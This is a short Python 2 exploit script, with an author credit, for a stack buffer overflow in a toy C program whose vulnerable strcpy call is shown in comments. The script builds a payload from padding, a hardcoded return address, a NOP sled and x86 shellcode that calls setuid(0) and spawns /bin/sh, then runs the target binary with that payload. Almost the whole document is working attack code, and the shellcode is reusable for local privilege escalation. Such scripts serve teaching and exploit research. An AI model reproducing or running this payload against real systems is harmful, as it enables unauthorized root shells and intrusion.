# Exploit Author: Sheila A. Berta - http://twitter.com/SheiiWinker
# Tested on: GNU/Linux - Debian
#
# Vulnerable code:

# #include <stdio.h>
# #include <string.h>

# int main(int argc, char** argv) {
#       char buffer[100];
#       strcpy(buffer, argv[1]); //Vulnerable function!
#       return 0;
# }

import subprocess
import os
import sys

if len(sys.argv) != 2:
        print "Usage: python exploit.py <path>"
        print "Example: python exploit.py /home/test"
        sys.exit(1)

junk = 'A' * 112
nopsled = '\x90' * 24

shellcode = (
'\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2' +
'\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89' +
'\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'
)

eip = '\x50\xf4\xff\xbf'

exploit = junk + eip + nopsled + shellcode

try:
        subprocess.call([sys.argv[1], exploit])
except OSError as e:
        if e.errno == os.errno.ENOENT:
                print "[X] file not found!"
        else:
                print "[X] Error executing exploit!"
                raise